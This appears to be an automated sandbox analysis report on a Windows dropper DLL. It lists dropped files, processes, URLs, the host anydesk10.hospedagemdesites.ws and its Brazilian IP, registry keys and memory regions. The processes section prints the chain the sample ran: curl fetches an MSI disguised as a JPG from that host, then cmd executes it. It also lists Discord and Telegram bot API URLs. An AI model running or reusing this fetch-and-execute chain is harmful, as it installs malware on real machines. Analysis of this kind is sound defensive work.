Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe (copy)
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe (copy)
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe (copy)
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MSIbbb33.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MSIbc4f7.LOG
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files.cab
|
Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986,
number 1, 175 datablocks, 0x1503 compression
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\3439ecd5563108439a8db68236176daf.tmp
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\vcruntime140.dll (copy)
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\msiwrapper.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files.cab
|
Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986,
number 1, 175 datablocks, 0x1503 compression
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\67fcf2e8352ef94eab64e4a4d4509680.tmp
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmp
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\vcruntime140.dll (copy)
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\msiwrapper.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files.cab
|
Microsoft Cabinet archive data, many, 2465794 bytes, 2 files, at 0x2c +A "UIServices.exe" +A "vcruntime140.dll", ID 29986,
number 1, 175 datablocks, 0x1503 compression
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\0eae52cd25d2e54183e98bebd14ba490.tmp
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmp
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\vcruntime140.dll (copy)
|
PE32+ executable (DLL) (console) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\msiwrapper.ini
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\spclwow78x.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office
16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject:
Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft
Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date:
Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name
of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
|
modified
|
||
C:\Windows\Installer\3bbba0.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office
16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject:
Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft
Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date:
Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name
of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
|
dropped
|
||
C:\Windows\Installer\3bbba1.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office
16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject:
Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft
Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date:
Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name
of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
|
dropped
|
||
C:\Windows\Installer\3bbba2.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office
16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject:
Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft
Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date:
Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name
of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
|
dropped
|
||
C:\Windows\Installer\MSI1F1E.tmp
|
data
|
dropped
|
||
C:\Windows\Installer\MSI1F4D.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\Installer\MSI24FC.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\Installer\MSI8C81.tmp
|
data
|
dropped
|
||
C:\Windows\Installer\MSI8CB0.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\Installer\MSI931A.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\Installer\MSIC14D.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\Installer\MSIECC4.tmp
|
data
|
modified
|
||
C:\Windows\Installer\MSIECF4.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Windows\Installer\SourceHash{F73CE0E6-78CF-454D-9161-7ECE19A3E9D5}
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Windows\Installer\inprogressinstallinfo.ipi
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Windows\Logs\DPX\setupact.log
|
CSV text
|
dropped
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\Windows\Temp\~DF08EC10C6FA1D2184.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Windows\Temp\~DF0E992ED88844D6C1.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DF17A798673345C078.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DF25B15AEE30697DAD.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Windows\Temp\~DF36464CBF16E54E06.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DF49A8548405E9067B.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Windows\Temp\~DF4DE7771CC64A5A9A.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DF4F91D2AF9D4E15DB.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Windows\Temp\~DF62C5956E9BC9E586.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DF7B2A307C8AA17666.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DF83A0503CF199010F.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DF8F3DF616D8AE56F9.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DFB2ED7D6DF90FC402.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DFC0DF350B38604086.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Windows\Temp\~DFCBACE4E1BA405D3C.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DFCCBD8EB92D670390.TMP
|
data
|
dropped
|
||
C:\Windows\Temp\~DFCE0B9ADDDB293763.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Windows\Temp\~DFF7B6CD3F78D0E5AF.TMP
|
data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CRLF, CR, LF line terminators
|
dropped
|
There are 47 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe
|
"C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe"
|
||
C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe
|
"C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe"
|
||
C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe
|
"C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
|
||
C:\Windows\System32\loaddll64.exe
|
loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
|
||
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
|
||
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
|
||
C:\Windows\System32\cmd.exe
|
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
|
||
C:\Windows\System32\cmd.exe
|
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\curl.exe
|
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
|
||
C:\Windows\System32\curl.exe
|
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
|
||
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
|
||
C:\Windows\System32\cmd.exe
|
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\curl.exe
|
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
|
||
C:\Windows\System32\cmd.exe
|
cmd /C %temp%\spclwow78x.msi
|
||
C:\Windows\System32\cmd.exe
|
cmd /C %temp%\spclwow78x.msi
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\msiexec.exe
|
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
|
||
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
||
C:\Windows\System32\msiexec.exe
|
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
|
||
C:\Windows\System32\cmd.exe
|
cmd /C %temp%\spclwow78x.msi
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\msiexec.exe
|
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 8954BF1BAC6ED414A355FBE261097B79
|
||
C:\Windows\SysWOW64\icacls.exe
|
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL
(CI)(OI)HIGH
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\expand.exe
|
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\icacls.exe
|
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL
(CI)(OI)LOW
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 3860C12BB15873291EECD7576AA6B0CD
|
||
C:\Windows\SysWOW64\icacls.exe
|
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL
(CI)(OI)HIGH
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\expand.exe
|
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\icacls.exe
|
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL
(CI)(OI)LOW
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 632F0AA6C1DCAE081535E1BA9D53BDC9
|
||
C:\Windows\SysWOW64\icacls.exe
|
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL
(CI)(OI)HIGH
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\expand.exe
|
"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\SysWOW64\icacls.exe
|
"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL
(CI)(OI)LOW
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 39 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://discord.com/api/v10/users/
|
unknown
|
||
https://api.telegram.org/bot
|
unknown
|
||
https://curl.se/docs/http-cookies.html
|
unknown
|
||
https://discord.com/api/v10/gatewayhttps://discord.com/api/v10/gateway/bot
|
unknown
|
||
https://discord.com/api/v10/guildshttps://discord.com/api/v10/invites/
|
unknown
|
||
https://github.com/serenity-rs/serenity
|
unknown
|
||
http://ipwhois.app/json/
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
|
unknown
|
||
https://discord.com/api/v10/voice/regionshttps://discord.com/api/v10/webhooks/
|
unknown
|
||
https://discord.com/
|
unknown
|
||
https://curl.se/docs/alt-svc.html
|
unknown
|
||
https://discord.com/api/v10/guilds/iconbannerjoined_atstring
|
unknown
|
||
https://discord.com/api/v10/interactions//callback
|
unknown
|
||
https://ipapi.co//json/
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg
|
191.252.51.12
|
||
https://discord.com/DDiscordBot
|
unknown
|
||
https://status.discord.com/api/v2/incidents/unresolved.jsonhttps://status.discord.com/api/v2/schedul
|
unknown
|
||
https://curl.se/docs/hsts.html
|
unknown
|
||
https://discord.com/api/v10/oauth2/applications/
|
unknown
|
||
https://freegeoip.app/json/X
|
unknown
|
||
http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e0061007600
|
unknown
|
||
https://discord.com/api/v10/channels/
|
unknown
|
||
https://discord.com/api/v10/sticker-packshttps://discord.com/api/v10/users/
|
unknown
|
||
http://ip-api.com/json/
|
unknown
|
||
https://freegeoip.app/json/
|
unknown
|
||
https://discord.com/api/v10/applications//commands/
|
unknown
|
||
http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e00630068006500
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
|
unknown
|
||
https://discord.com/api/v10/stage-instanceshttps://discord.com/api/v10/stage-instances/
|
unknown
|
||
https://docs.rs/getrandom#nodejs-es-module-supportCalling
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg8
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg4
|
unknown
|
There are 22 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
anydesk10.hospedagemdesites.ws
|
191.252.51.12
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
191.252.51.12
|
anydesk10.hospedagemdesites.ws
|
Brazil
|
||
192.168.2.1
|
unknown
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\msiexec.exe.FriendlyAppName
|
||
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\msiexec.exe.ApplicationCompany
|
||
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
Owner
|
||
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
Sequence
|
||
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
Owner
|
||
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
Sequence
|
||
HKEY_CURRENT_USER\Software\Microsoft\RestartManager\Session0000
|
SessionHash
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
29C1E260000
|
heap
|
page read and write
|
||
1EEDC270000
|
heap
|
page read and write
|
||
1E122F60000
|
unkown
|
page readonly
|
||
27DB7518000
|
heap
|
page read and write
|
||
2719DC50000
|
heap
|
page read and write
|
||
7FF643397000
|
unkown
|
page readonly
|
||
2DB0000
|
heap
|
page read and write
|
||
221E5ACB000
|
heap
|
page read and write
|
||
2AC32EA0000
|
heap
|
page read and write
|
||
1EEDCB43000
|
heap
|
page read and write
|
||
27DB50A4000
|
heap
|
page read and write
|
||
1EEDC293000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
7FF7974E4000
|
unkown
|
page write copy
|
||
1F505C13000
|
heap
|
page read and write
|
||
51A1000
|
trusted library allocation
|
page read and write
|
||
A5F000
|
heap
|
page read and write
|
||
EE6B2F8000
|
stack
|
page read and write
|
||
18E5ACFA000
|
heap
|
page read and write
|
||
29C1E39D000
|
heap
|
page read and write
|
||
27DB6F11000
|
heap
|
page read and write
|
||
221E5A30000
|
unkown
|
page read and write
|
||
29C1E742000
|
heap
|
page read and write
|
||
21271A30000
|
heap
|
page read and write
|
||
1F505C06000
|
heap
|
page read and write
|
||
18E5880D000
|
heap
|
page read and write
|
||
2852F85C000
|
heap
|
page read and write
|
||
18E5AA71000
|
heap
|
page read and write
|
||
237F57DE000
|
heap
|
page read and write
|
||
7FFC23C75000
|
unkown
|
page readonly
|
||
2852F900000
|
heap
|
page read and write
|
||
231CDFF9000
|
heap
|
page read and write
|
||
25708A50000
|
heap
|
page read and write
|
||
27DB50D6000
|
heap
|
page read and write
|
||
18E5ABDC000
|
heap
|
page read and write
|
||
1F505B60000
|
unkown
|
page readonly
|
||
59D3CFD000
|
stack
|
page read and write
|
||
29C1E3D9000
|
heap
|
page read and write
|
||
29C1E6F3000
|
heap
|
page read and write
|
||
29C1E464000
|
heap
|
page read and write
|
||
27DB702D000
|
heap
|
page read and write
|
||
3159000
|
heap
|
page read and write
|
||
F9A757B000
|
stack
|
page read and write
|
||
27DB6E2E000
|
heap
|
page read and write
|
||
27DB50DD000
|
heap
|
page read and write
|
||
221E5ACE000
|
heap
|
page read and write
|
||
27DB6FC0000
|
heap
|
page read and write
|
||
27DB7279000
|
heap
|
page read and write
|
||
5AAAE7E000
|
stack
|
page read and write
|
||
1840CA60000
|
heap
|
page read and write
|
||
29C1E817000
|
heap
|
page read and write
|
||
29C1E277000
|
heap
|
page read and write
|
||
18E5AA9B000
|
heap
|
page read and write
|
||
7FF6FC357000
|
unkown
|
page readonly
|
||
361F000
|
stack
|
page read and write
|
||
29C1E3DC000
|
heap
|
page read and write
|
||
29C1E35D000
|
heap
|
page read and write
|
||
27DB7014000
|
heap
|
page read and write
|
||
18E5A824000
|
heap
|
page read and write
|
||
18E587EC000
|
heap
|
page read and write
|
||
29C1C561000
|
heap
|
page read and write
|
||
18E5AB42000
|
heap
|
page read and write
|
||
27DB733D000
|
heap
|
page read and write
|
||
29C1E373000
|
heap
|
page read and write
|
||
34D9000
|
heap
|
page read and write
|
||
27DB6F93000
|
heap
|
page read and write
|
||
29C1E68F000
|
heap
|
page read and write
|
||
7FF6FC4A4000
|
unkown
|
page read and write
|
||
7FF6434E4000
|
unkown
|
page read and write
|
||
27DB6EED000
|
heap
|
page read and write
|
||
29C1E39D000
|
heap
|
page read and write
|
||
29C1E2D5000
|
heap
|
page read and write
|
||
27DB50C3000
|
heap
|
page read and write
|
||
231CEC30000
|
trusted library allocation
|
page read and write
|
||
27858413000
|
heap
|
page read and write
|
||
18E5880C000
|
heap
|
page read and write
|
||
29C1E276000
|
heap
|
page read and write
|
||
29C1E68B000
|
heap
|
page read and write
|
||
29C1E692000
|
heap
|
page read and write
|
||
27DB50DB000
|
heap
|
page read and write
|
||
29C1E692000
|
heap
|
page read and write
|
||
27DB7348000
|
heap
|
page read and write
|
||
F9A74FD000
|
stack
|
page read and write
|
||
550000
|
remote allocation
|
page read and write
|
||
3490000
|
trusted library allocation
|
page read and write
|
||
29C1E355000
|
heap
|
page read and write
|
||
29C1E816000
|
heap
|
page read and write
|
||
573E6FE000
|
stack
|
page read and write
|
||
18E5A6FC000
|
heap
|
page read and write
|
||
29C1E661000
|
heap
|
page read and write
|
||
27DB6FBB000
|
heap
|
page read and write
|
||
182AE397000
|
heap
|
page read and write
|
||
182AE3AB000
|
heap
|
page read and write
|
||
1F505C4C000
|
heap
|
page read and write
|
||
29C1C513000
|
heap
|
page read and write
|
||
29C1E354000
|
heap
|
page read and write
|
||
29C1E244000
|
heap
|
page read and write
|
||
18E5AA9B000
|
heap
|
page read and write
|
||
29C1EA67000
|
heap
|
page read and write
|
||
34C0000
|
heap
|
page read and write
|
||
56D25FF000
|
stack
|
page read and write
|
||
29C1E354000
|
heap
|
page read and write
|
||
29C1E3C6000
|
heap
|
page read and write
|
||
BF0000
|
remote allocation
|
page read and write
|
||
18E5A750000
|
heap
|
page read and write
|
||
EE69FFE000
|
stack
|
page read and write
|
||
3670000
|
heap
|
page read and write
|
||
29C1C563000
|
heap
|
page read and write
|
||
2AC3304E000
|
heap
|
page read and write
|
||
221E5C40000
|
heap
|
page read and write
|
||
329C000
|
stack
|
page read and write
|
||
F9A727F000
|
stack
|
page read and write
|
||
1AFAEC37000
|
heap
|
page read and write
|
||
27DB72A2000
|
heap
|
page read and write
|
||
27DB6F95000
|
heap
|
page read and write
|
||
56D23FF000
|
stack
|
page read and write
|
||
27DB7039000
|
heap
|
page read and write
|
||
1AFAEC41000
|
heap
|
page read and write
|
||
2785847F000
|
heap
|
page read and write
|
||
29C1E28D000
|
heap
|
page read and write
|
||
237F5827000
|
heap
|
page read and write
|
||
29C1E26F000
|
heap
|
page read and write
|
||
333E000
|
stack
|
page read and write
|
||
A91EFFE000
|
stack
|
page read and write
|
||
29C1E24F000
|
heap
|
page read and write
|
||
18E5A77C000
|
heap
|
page read and write
|
||
1C82B840000
|
heap
|
page read and write
|
||
18E5AB3D000
|
heap
|
page read and write
|
||
18E5A711000
|
heap
|
page read and write
|
||
182AE353000
|
heap
|
page read and write
|
||
18E5AB8C000
|
heap
|
page read and write
|
||
231CE001000
|
heap
|
page read and write
|
||
216AF835000
|
heap
|
page read and write
|
||
5B37DFF000
|
stack
|
page read and write
|
||
18E5A81C000
|
heap
|
page read and write
|
||
231CE011000
|
heap
|
page read and write
|
||
29C1E45C000
|
heap
|
page read and write
|
||
17782160000
|
heap
|
page read and write
|
||
18E5AA7F000
|
heap
|
page read and write
|
||
18E5AB50000
|
heap
|
page read and write
|
||
2AC33000000
|
heap
|
page read and write
|
||
1B09FC02000
|
trusted library allocation
|
page read and write
|
||
182AE170000
|
unkown
|
page readonly
|
||
27DB751E000
|
heap
|
page read and write
|
||
21271970000
|
unkown
|
page read and write
|
||
27858350000
|
heap
|
page read and write
|
||
29C1E251000
|
heap
|
page read and write
|
||
2AC33046000
|
heap
|
page read and write
|
||
18E5AB5C000
|
heap
|
page read and write
|
||
29C1E3C3000
|
heap
|
page read and write
|
||
27DB6FA3000
|
heap
|
page read and write
|
||
18E587F4000
|
heap
|
page read and write
|
||
29C1E2CB000
|
heap
|
page read and write
|
||
182AE38E000
|
heap
|
page read and write
|
||
1B09F43D000
|
heap
|
page read and write
|
||
27DB7271000
|
heap
|
page read and write
|
||
221E59D0000
|
heap
|
page read and write
|
||
2E0A000
|
heap
|
page read and write
|
